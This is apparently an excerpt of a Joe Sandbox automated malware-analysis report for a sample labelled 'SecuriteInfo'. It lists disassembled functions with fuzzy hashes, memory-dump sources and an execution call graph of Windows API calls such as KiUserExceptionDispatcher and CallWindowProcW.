                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a3d000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ae8faed18134251be7da795e85ade6b132c84643db4099356389b19b4f3572d3
                                                                                            • Instruction ID: 5adf3ae5ec5e7fccdc59b6b56cec59a708192857fd710d7a478833ef32807387
                                                                                            • Opcode Fuzzy Hash: ae8faed18134251be7da795e85ade6b132c84643db4099356389b19b4f3572d3
                                                                                            • Instruction Fuzzy Hash: EE11E676504284DFCF01CF10D5C4B16BF72FB94320F24C6A9E8484B656C33AE85ACBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A3D4D3 Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.343329566.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a3d000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ae8faed18134251be7da795e85ade6b132c84643db4099356389b19b4f3572d3
                                                                                            • Instruction ID: 732866228e7fe73526df1bf996ec7fd4df146ff44cb80fd623da3f6ba29b5566
                                                                                            • Opcode Fuzzy Hash: ae8faed18134251be7da795e85ade6b132c84643db4099356389b19b4f3572d3
                                                                                            • Instruction Fuzzy Hash: 4D110876504280CFCF12CF10D5C4B16BF71FB94324F24C6A9E8054B656C33AD85ACBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A4D017 Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.343410847.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a4d000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c02608ae7fdd6dbde4dc06ae057c33988074160e7ca121dc10ae75c1f0855aa5
                                                                                            • Instruction ID: 009d6b10877a8af8fa0de14b88d5094cc295f406c48f220932df92755985da99
                                                                                            • Opcode Fuzzy Hash: c02608ae7fdd6dbde4dc06ae057c33988074160e7ca121dc10ae75c1f0855aa5
                                                                                            • Instruction Fuzzy Hash: 1C11BB79504280CFCB11CF10D5C4B15BBA1FB84324F28C6AAD80A4B656C33AD84BCBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A4D1CF Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.343410847.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a4d000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c02608ae7fdd6dbde4dc06ae057c33988074160e7ca121dc10ae75c1f0855aa5
                                                                                            • Instruction ID: 06b29a05d0e33aae737f0e7e8f5ed22ab8868dc7ef1460d94ca89400c076c782
                                                                                            • Opcode Fuzzy Hash: c02608ae7fdd6dbde4dc06ae057c33988074160e7ca121dc10ae75c1f0855aa5
                                                                                            • Instruction Fuzzy Hash: 63118879904284DFCB12CF10D5C4B55BBB1FB84324F28C6AAD8494B696C37AD85ACB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A3D745 Relevance: .0, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.343329566.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a3d000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 46f9612ec006fe30e343eca319709448874dc554698717dcb4acd0e18578246d
                                                                                            • Instruction ID: 80457287c019cf809babeaacfb0e3f67904e376faf186a4aad9a5762f779463a
                                                                                            • Opcode Fuzzy Hash: 46f9612ec006fe30e343eca319709448874dc554698717dcb4acd0e18578246d
                                                                                            • Instruction Fuzzy Hash: 07012B714083C4DAE7108F21DC84B6AFBA8EF41378F18C55AFD045F24AD3799844DAB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00A3D744 Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.343329566.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a3d000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: faf94d984be0f20cb5cbc126279d31fbb28e6e4b84236a8364345bafc2ddeb1c
                                                                                            • Instruction ID: 6d53aacfeb64e7593e3fa7e86e4659e2f557afe35dbd4a974117aeb22b6ace46
                                                                                            • Opcode Fuzzy Hash: faf94d984be0f20cb5cbc126279d31fbb28e6e4b84236a8364345bafc2ddeb1c
                                                                                            • Instruction Fuzzy Hash: C8F06271404284AEEB508F15DC88B66FF98EB41774F18C45AED085F286C379AC44CAB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 00AE6E28 Relevance: .2, Instructions: 160COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.343735632.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_ae0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 36182436cebeb55a52715cb650506d86002e0dbd806e213bbc15d2a3cce4ea62
                                                                                            • Instruction ID: f0d7a16b46fd9e45e0e9ff2d180b6a824ee227d9f799de79a265752e9d4b8eba
                                                                                            • Opcode Fuzzy Hash: 36182436cebeb55a52715cb650506d86002e0dbd806e213bbc15d2a3cce4ea62
                                                                                            • Instruction Fuzzy Hash: DA613778D046448FDB49DFAAE941A8EBBF2BBCD304F04C539D104AB278EB71590A9F51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE70B7 Relevance: .1, Instructions: 137COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.343735632.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_ae0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 872ba1ac04d1f758b9895e810ca135c9b770f575bb643e8f0f0dc25e0a5f4ea1
                                                                                            • Instruction ID: fd265d9b7d7d24fa5057ea9d1e8b03f0d7a96397fd38b6406e8ae8a96687f235
                                                                                            • Opcode Fuzzy Hash: 872ba1ac04d1f758b9895e810ca135c9b770f575bb643e8f0f0dc25e0a5f4ea1
                                                                                            • Instruction Fuzzy Hash: 35517CB2E056548BEB1CCF6B984068EBBF3AFC9214F19C1BAC80C6B619DB3115569F41
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE70C8 Relevance: .1, Instructions: 102COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.343735632.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_ae0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 869f58f4f22fb48e1151ed65f7485108ba3ee99dc2843e71f201f3e058658950
                                                                                            • Instruction ID: 2b358ca9e1033039a4c742caa7b311e08dd4808195ec25e5da8e27d4f2868705
                                                                                            • Opcode Fuzzy Hash: 869f58f4f22fb48e1151ed65f7485108ba3ee99dc2843e71f201f3e058658950
                                                                                            • Instruction Fuzzy Hash: BE412471E056588BEB1CCF6B8D4028EFAF3AFC9310F14C1BA990CAA264EB3105568F51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Execution Graph

                                                                                            Execution Coverage:21%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:377
                                                                                            Total number of Limit Nodes:13
                                                                                            execution_graph 27437 60af988 27438 60af98c 27437->27438 27442 60af9e8 27438->27442 27445 60af9e3 27438->27445 27439 60af9af 27443 60afa29 KiUserCallbackDispatcher 27442->27443 27444 60afa56 27443->27444 27444->27439 27446 60af9e8 KiUserCallbackDispatcher 27445->27446 27448 60afa56 27446->27448 27448->27439 27449 60a6300 27451 60a6309 27449->27451 27450 60a6401 27451->27450 27454 60a6418 27451->27454 27485 60a6407 27451->27485 27455 60a6437 27454->27455 27456 60a645f 27455->27456 27516 60a758c 27455->27516 27524 60a73f7 27455->27524 27532 60a7376 27455->27532 27540 60a7172 27455->27540 27548 60a77f9 27455->27548 27552 60a76e5 27455->27552 27556 60a7262 27455->27556 27564 60a72ec 27455->27564 27572 60a776f 27455->27572 27576 60a75d1 27455->27576 27584 60a71d8 27455->27584 27592 60a765b 27455->27592 27600 60a7547 27455->27600 27608 60a77b4 27455->27608 27612 60a7331 27455->27612 27620 60a6830 27455->27620 27625 60a74bd 27455->27625 27633 60a743c 27455->27633 27641 60a73bb 27455->27641 27649 60a72a7 27455->27649 27657 60a76a0 27455->27657 27663 60a772a 27455->27663 27667 60a7616 27455->27667 27675 60a7193 27455->27675 27683 60a721d 27455->27683 27691 60a681f 27455->27691 27696 60a7481 27455->27696 27704 60a7502 27455->27704 27486 60a6437 27485->27486 27487 60a645f 27486->27487 27488 60a758c 3 API calls 27486->27488 27489 60a7502 3 API calls 27486->27489 27490 60a7481 3 API calls 27486->27490 27491 60a681f 2 API calls 27486->27491 27492 60a721d 3 API calls 27486->27492 27493 60a7193 3 API calls 27486->27493 27494 60a7616 3 API calls 27486->27494 27495 60a772a KiUserExceptionDispatcher 27486->27495 27496 60a76a0 2 API calls 27486->27496 27497 60a72a7 3 API calls 27486->27497 27498 60a73bb 3 API calls 27486->27498 27499 60a743c 3 API calls 27486->27499 27500 60a74bd 3 API calls 27486->27500 27501 60a6830 2 API calls 27486->27501 27502 60a7331 3 API calls 27486->27502 27503 60a77b4 KiUserExceptionDispatcher 27486->27503 27504 60a7547 3 API calls 27486->27504 27505 60a765b 3 API calls 27486->27505 27506 60a71d8 3 API calls 27486->27506 27507 60a75d1 3 API calls 27486->27507 27508 60a776f KiUserExceptionDispatcher 27486->27508 27509 60a72ec 3 API calls 27486->27509 27510 60a7262 3 API calls 27486->27510 27511 60a76e5 KiUserExceptionDispatcher 27486->27511 27512 60a77f9 KiUserExceptionDispatcher 27486->27512 27513 60a7172 3 API calls 27486->27513 27514 60a7376 3 API calls 27486->27514 27515 60a73f7 3 API calls 27486->27515 27488->27487 27489->27487 27490->27487 27491->27487 27492->27487 27493->27487 27494->27487 27495->27487 27496->27487 27497->27487 27498->27487 27499->27487 27500->27487 27501->27487 27502->27487 27503->27487 27504->27487 27505->27487 27506->27487 27507->27487 27508->27487 27509->27487 27510->27487 27511->27487 27512->27487 27513->27487 27514->27487 27515->27487 27517 60a759d KiUserExceptionDispatcher 27516->27517 27519 60a769e KiUserExceptionDispatcher 27517->27519 27521 60a76e3 KiUserExceptionDispatcher 27519->27521 27523 60a783c 27521->27523 27523->27456 27525 60a7408 KiUserExceptionDispatcher 27524->27525 27527 60a769e KiUserExceptionDispatcher 27525->27527 27529 60a76e3 KiUserExceptionDispatcher 27527->27529 27531 60a783c 27529->27531 27531->27456 27533 60a7387 KiUserExceptionDispatcher 27532->27533 27535 60a769e KiUserExceptionDispatcher 27533->27535 27537 60a76e3 KiUserExceptionDispatcher 27535->27537 27539 60a783c 27537->27539 27539->27456 27541 60a7178 KiUserExceptionDispatcher 27540->27541 27543 60a769e KiUserExceptionDispatcher 27541->27543 27545 60a76e3 KiUserExceptionDispatcher 27543->27545 27547 60a783c 27545->27547 27547->27456 27549 60a780a KiUserExceptionDispatcher 27548->27549 27551 60a783c 27549->27551 27551->27456 27553 60a76f6 KiUserExceptionDispatcher 27552->27553 27555 60a783c 27553->27555 27555->27456 27557 60a7273 KiUserExceptionDispatcher 27556->27557 27559 60a769e KiUserExceptionDispatcher 27557->27559 27561 60a76e3 KiUserExceptionDispatcher 27559->27561 27563 60a783c 27561->27563 27563->27456 27565 60a72fd KiUserExceptionDispatcher 27564->27565 27567 60a769e KiUserExceptionDispatcher 27565->27567 27569 60a76e3 KiUserExceptionDispatcher 27567->27569 27571 60a783c 27569->27571 27571->27456 27573 60a7780 KiUserExceptionDispatcher 27572->27573 27575 60a783c 27573->27575 27575->27456 27577 60a75e2 KiUserExceptionDispatcher 27576->27577 27579 60a769e KiUserExceptionDispatcher 27577->27579 27581 60a76e3 KiUserExceptionDispatcher 27579->27581 27583 60a783c 27581->27583 27583->27456 27585 60a71e9 KiUserExceptionDispatcher 27584->27585 27587 60a769e KiUserExceptionDispatcher 27585->27587 27589 60a76e3 KiUserExceptionDispatcher 27587->27589 27591 60a783c 27589->27591 27591->27456 27593 60a766c KiUserExceptionDispatcher 27592->27593 27595 60a769e KiUserExceptionDispatcher 27593->27595 27597 60a76e3 KiUserExceptionDispatcher 27595->27597 27599 60a783c 27597->27599 27599->27456 27601 60a7558 KiUserExceptionDispatcher 27600->27601 27603 60a769e KiUserExceptionDispatcher 27601->27603 27605 60a76e3 KiUserExceptionDispatcher 27603->27605 27607 60a783c 27605->27607 27607->27456 27609 60a77c5 KiUserExceptionDispatcher 27608->27609 27611 60a783c 27609->27611 27611->27456 27613 60a7342 KiUserExceptionDispatcher 27612->27613 27615 60a769e KiUserExceptionDispatcher 27613->27615 27617 60a76e3 KiUserExceptionDispatcher 27615->27617 27619 60a783c 27617->27619 27619->27456 27621 60a6855 27620->27621 27712 60a9300 27621->27712 27721 60a9310 27621->27721 27622 60a70c9 27626 60a74ce KiUserExceptionDispatcher 27625->27626 27628 60a769e KiUserExceptionDispatcher 27626->27628 27630 60a76e3 KiUserExceptionDispatcher 27628->27630 27632 60a783c 27630->27632 27632->27456 27634 60a744d KiUserExceptionDispatcher 27633->27634 27636 60a769e KiUserExceptionDispatcher 27634->27636 27638 60a76e3 KiUserExceptionDispatcher 27636->27638 27640 60a783c 27638->27640 27640->27456 27642 60a73cc KiUserExceptionDispatcher 27641->27642 27644 60a769e KiUserExceptionDispatcher 27642->27644 27646 60a76e3 KiUserExceptionDispatcher 27644->27646 27648 60a783c 27646->27648 27648->27456 27650 60a72b8 KiUserExceptionDispatcher 27649->27650 27652 60a769e KiUserExceptionDispatcher 27650->27652 27654 60a76e3 KiUserExceptionDispatcher 27652->27654 27656 60a783c 27654->27656 27656->27456 27658 60a76b1 KiUserExceptionDispatcher 27657->27658 27660 60a76e3 KiUserExceptionDispatcher 27658->27660 27662 60a783c 27660->27662 27662->27456 27664 60a773b KiUserExceptionDispatcher 27663->27664 27666 60a783c 27664->27666 27666->27456 27668 60a7627 KiUserExceptionDispatcher 27667->27668 27670 60a769e KiUserExceptionDispatcher 27668->27670 27672 60a76e3 KiUserExceptionDispatcher 27670->27672 27674 60a783c 27672->27674 27674->27456 27676 60a71a4 KiUserExceptionDispatcher 27675->27676 27678 60a769e KiUserExceptionDispatcher 27676->27678 27680 60a76e3 KiUserExceptionDispatcher 27678->27680 27682 60a783c 27680->27682 27682->27456 27684 60a722e KiUserExceptionDispatcher 27683->27684 27686 60a769e KiUserExceptionDispatcher 27684->27686 27688 60a76e3 KiUserExceptionDispatcher 27686->27688 27690 60a783c 27688->27690 27690->27456 27692 60a6830 27691->27692 27694 60a9300 2 API calls 27692->27694 27695 60a9310 2 API calls 27692->27695 27693 60a70c9 27694->27693 27695->27693 27697 60a7492 KiUserExceptionDispatcher 27696->27697 27699 60a769e KiUserExceptionDispatcher 27697->27699 27701 60a76e3 KiUserExceptionDispatcher 27699->27701 27703 60a783c 27701->27703 27703->27456 27705 60a7513 KiUserExceptionDispatcher 27704->27705 27707 60a769e KiUserExceptionDispatcher 27705->27707 27709 60a76e3 KiUserExceptionDispatcher 27707->27709 27711 60a783c 27709->27711 27711->27456 27714 60a9338 27712->27714 27713 60a9758 27713->27622 27714->27713 27718 60a9300 2 API calls 27714->27718 27719 60a9310 2 API calls 27714->27719 27730 60aee78 27714->27730 27735 60aee69 27714->27735 27740 60af041 27714->27740 27744 60aac98 27714->27744 27718->27714 27719->27714 27723 60a9338 27721->27723 27722 60a9758 27722->27622 27723->27722 27724 60a9300 2 API calls 27723->27724 27725 60a9310 2 API calls 27723->27725 27726 60aac98 2 API calls 27723->27726 27727 60aee78 2 API calls 27723->27727 27728 60aee69 2 API calls 27723->27728 27729 60af041 2 API calls 27723->27729 27724->27723 27725->27723 27726->27723 27727->27723 27728->27723 27729->27723 27731 60aee91 27730->27731 27732 60aefca 27730->27732 27731->27732 27750 60af0e8 27731->27750 27732->27714 27736 60aefca 27735->27736 27737 60aee91 27735->27737 27736->27714 27737->27736 27739 60af0e8 2 API calls 27737->27739 27738 60af0c5 27738->27714 27739->27738 27741 60af06c 27740->27741 27743 60af0e8 2 API calls 27741->27743 27742 60af0c5 27742->27714 27743->27742 27745 60aacb9 27744->27745 27746 60aacdc 27744->27746 27745->27714 27747 60aad7a 27746->27747 27895 60aae30 27746->27895 27900 60aae40 27746->27900 27747->27714 27751 60af0f5 27750->27751 27752 60af16e 27751->27752 27753 60af1a1 27751->27753 27755 60af0c5 27751->27755 27752->27755 27758 60af298 27752->27758 27763 60af293 27752->27763 27768 60aaed0 27753->27768 27755->27714 27759 60af2aa 27758->27759 27760 60af31c 27759->27760 27786 60af61b 27759->27786 27790 60af628 27759->27790 27760->27755 27764 60af2aa 27763->27764 27765 60af31c 27764->27765 27766 60af61b CallWindowProcW 27764->27766 27767 60af628 CallWindowProcW 27764->27767 27765->27755 27766->27764 27767->27764 27769 60aaf08 27768->27769 27770 60aaef4 27768->27770 27774 60aaf19 27769->27774 27780 60ab038 2 API calls 27769->27780 27781 60aaec0 2 API calls 27769->27781 27782 60aaed0 2 API calls 27769->27782 27770->27769 27771 60aaf47 27770->27771 27777 60aaed0 2 API calls 27771->27777 27794 60aaec0 27771->27794 27812 60ab038 27771->27812 27772 60aaf58 27772->27774 27818 60ab7f0 27772->27818 27833 60ab7e0 27772->27833 27773 60aaf97 27773->27774 27848 60adbb4 27773->27848 27854 60ae488 27773->27854 27860 60ae655 27773->27860 27774->27755 27777->27772 27780->27774 27781->27774 27782->27774 27787 60af622 27786->27787 27789 60af671 27786->27789 27788 60af6c2 CallWindowProcW 27787->27788 27787->27789 27788->27789 27789->27759 27791 60af62a 27790->27791 27792 60af6c2 CallWindowProcW 27791->27792 27793 60af671 27791->27793 27792->27793 27793->27759 27795 60aaef4 27794->27795 27799 60aaf08 27794->27799 27796 60aaf47 27795->27796 27795->27799 27807 60ab038 2 API calls 27796->27807 27808 60aaec0 2 API calls 27796->27808 27809 60aaed0 2 API calls 27796->27809 27797 60aaf58 27800 60aaf19 27797->27800 27810 60ab7e0 2 API calls 27797->27810 27811 60ab7f0 2 API calls 27797->27811 27798 60aaf97 27798->27800 27804 60ae488 2 API calls 27798->27804 27805 60adbb4 2 API calls 27798->27805 27806 60ae655 2 API calls 27798->27806 27799->27800 27801 60ab038 2 API calls 27799->27801 27802 60aaec0 2 API calls 27799->27802 27803 60aaed0 2 API calls 27799->27803 27800->27772 27801->27800 27802->27800 27803->27800 27804->27800 27805->27800 27806->27800 27807->27797 27808->27797 27809->27797 27810->27798 27811->27798 27813 60ab048 27812->27813 27814 60ab06c 27813->27814 27815 60ab038 2 API calls 27813->27815 27816 60aaec0 2 API calls 27813->27816 27817 60aaed0 2 API calls 27813->27817 27814->27772 27815->27814 27816->27814 27817->27814 27820 60ab82c 27818->27820 27821 60ab938 27818->27821 27819 60ab907 27819->27821 27824 60ab84f 27819->27824 27865 60ac530 27819->27865 27870 60ac540 27819->27870 27820->27821 27820->27824 27829 60ab7e0 2 API calls 27820->27829 27830 60ab7f0 2 API calls 27820->27830 27821->27824 27827 60ab7e0 2 API calls 27821->27827 27828 60ab7f0 2 API calls 27821->27828 27822 60abe97 27822->27773 27823 60abe46 27823->27822 27831 60ac530 2 API calls 27823->27831 27832 60ac540 2 API calls 27823->27832 27824->27773 27827->27823 27828->27823 27829->27819 27830->27819 27831->27823 27832->27823 27835 60ab82c 27833->27835 27836 60ab938 27833->27836 27834 60ab907 27834->27836 27839 60ab84f 27834->27839 27844 60ac530 2 API calls 27834->27844 27845 60ac540 2 API calls 27834->27845 27835->27836 27835->27839 27840 60ab7e0 2 API calls 27835->27840 27841 60ab7f0 2 API calls 27835->27841 27836->27839 27846 60ab7e0 2 API calls 27836->27846 27847 60ab7f0 2 API calls 27836->27847 27837 60abe46 27838 60abe97 27837->27838 27842 60ac530 2 API calls 27837->27842 27843 60ac540 2 API calls 27837->27843 27838->27773 27839->27773 27840->27834 27841->27834 27842->27837 27843->27837 27844->27836 27845->27836 27846->27837 27847->27837 27849 60adbc9 27848->27849 27851 60adff0 27849->27851 27852 60aee78 2 API calls 27849->27852 27853 60aee69 2 API calls 27849->27853 27850 60ae672 27850->27774 27851->27774 27852->27850 27853->27850 27855 60ae4a1 27854->27855 27857 60ae497 27854->27857 27855->27857 27858 60aee78 2 API calls 27855->27858 27859 60aee69 2 API calls 27855->27859 27856 60ae672 27856->27774 27857->27774 27858->27856 27859->27856 27861 60ae660 27860->27861 27863 60aee78 2 API calls 27861->27863 27864 60aee69 2 API calls 27861->27864 27862 60ae672 27862->27774 27863->27862 27864->27862 27867 60ac535 27865->27867 27866 60ac8da 27866->27821 27867->27866 27875 60ad0b8 27867->27875 27880 60ad0c8 27867->27880 27871 60ac8da 27870->27871 27872 60ac56b 27870->27872 27871->27821 27872->27871 27873 60ad0b8 2 API calls 27872->27873 27874 60ad0c8 2 API calls 27872->27874 27873->27872 27874->27872 27876 60ad0c8 27875->27876 27877 60ad0da 27876->27877 27885 60ad2b8 27876->27885 27891 60ad400 27876->27891 27877->27867 27881 60ad0e4 27880->27881 27882 60ad0da 27880->27882 27881->27882 27883 60ad2b8 2 API calls 27881->27883 27884 60ad400 2 API calls 27881->27884 27882->27867 27883->27882 27884->27882 27887 60ad2ca 27885->27887 27886 60ad36d 27886->27877 27887->27886 27889 60ad4f8 CallWindowProcW CallWindowProcW 27887->27889 27890 60ad508 CallWindowProcW CallWindowProcW 27887->27890 27888 60ad426 27888->27877 27889->27888 27890->27888 27893 60ad4f8 CallWindowProcW CallWindowProcW 27891->27893 27894 60ad508 CallWindowProcW CallWindowProcW 27891->27894 27892 60ad426 27892->27877 27893->27892 27894->27892 27896 60aae53 27895->27896 27898 60aaec0 2 API calls 27896->27898 27899 60aaed0 2 API calls 27896->27899 27897 60aaeb3 27897->27747 27898->27897 27899->27897 27901 60aae53 27900->27901 27903 60aaec0 2 API calls 27901->27903 27904 60aaed0 2 API calls 27901->27904 27902 60aaeb3 27902->27747 27903->27902 27904->27902 27905 2dbb4d0 27906 2dbb4ee 27905->27906 27909 2db9e1c 27906->27909 27908 2dbb525 27910 2dbcff0 LoadLibraryA 27909->27910 27912 2dbd0cc 27910->27912 27913 2db4560 27914 2db4574 27913->27914 27917 2db47aa 27914->27917 27915 2db457d 27918 2db47b3 27917->27918 27923 2db4881 27917->27923 27927 2db498c 27917->27927 27931 2db49a6 27917->27931 27935 2db4890 27917->27935 27918->27915 27924 2db4890 27923->27924 27925 2db49cb 27924->27925 27939 2db4c88 27924->27939 27928 2db493f 27927->27928 27929 2db49cb 27928->27929 27930 2db4c88 2 API calls 27928->27930 27930->27929 27932 2db49b9 27931->27932 27933 2db49cb 27931->27933 27934 2db4c88 2 API calls 27932->27934 27934->27933 27936 2db48d4 27935->27936 27937 2db49cb 27936->27937 27938 2db4c88 2 API calls 27936->27938 27938->27937 27940 2db4ca6 27939->27940 27944 2db4cd8 27940->27944 27948 2db4ce8 27940->27948 27941 2db4cb6 27941->27925 27945 2db4ce8 27944->27945 27946 2db4d4c RtlEncodePointer 27945->27946 27947 2db4d75 27945->27947 27946->27947 27947->27941 27949 2db4d22 27948->27949 27950 2db4d4c RtlEncodePointer 27949->27950 27951 2db4d75 27949->27951 27950->27951 27951->27941

                                                                                            Executed Functions

                                                                                            Function 060A7172 Relevance: 4.8, APIs: 3, Instructions: 347COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 60a7172-60a7e2a KiUserExceptionDispatcher * 3 140 60a7e30-60a7e7f 0->140
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A767F
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 8f1bb46e98f20c5913c11125afa0eb1e79822f7cf8016927c75e8563f292db30
                                                                                            • Instruction ID: 8c41a79e50d4d91a62f78c4cc18b40b836c571f20b915bb6d607fe10832f92bb
                                                                                            • Opcode Fuzzy Hash: 8f1bb46e98f20c5913c11125afa0eb1e79822f7cf8016927c75e8563f292db30
                                                                                            • Instruction Fuzzy Hash: 5E026738A45358CFCB65DF60D88869DBBB2BF49346F5081E9E50A62740CB398EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A7193 Relevance: 4.8, APIs: 3, Instructions: 347COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 143 60a7193-60a7e2a KiUserExceptionDispatcher * 3 283 60a7e30-60a7e7f 143->283
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A767F
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 9ccc5cc482f50d58753e271f634b41e66120f667c791e21aaf5f822cc66b0f00
                                                                                            • Instruction ID: 36a44af7125173835db4fe31bc0c059c12b3a57ab1f3e0d060f703c0deba1b7d
                                                                                            • Opcode Fuzzy Hash: 9ccc5cc482f50d58753e271f634b41e66120f667c791e21aaf5f822cc66b0f00
                                                                                            • Instruction Fuzzy Hash: 8B025738A45358CFCB65DF60D88869DBBB2BF49346F5081E9E50A62740CB398EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A71D8 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 286 60a71d8-60a7e2a KiUserExceptionDispatcher * 3 423 60a7e30-60a7e7f 286->423
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A767F
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: db58713585e3a69251ff596069734d6abdd75fa92419783d6d62eb1e311c3b12
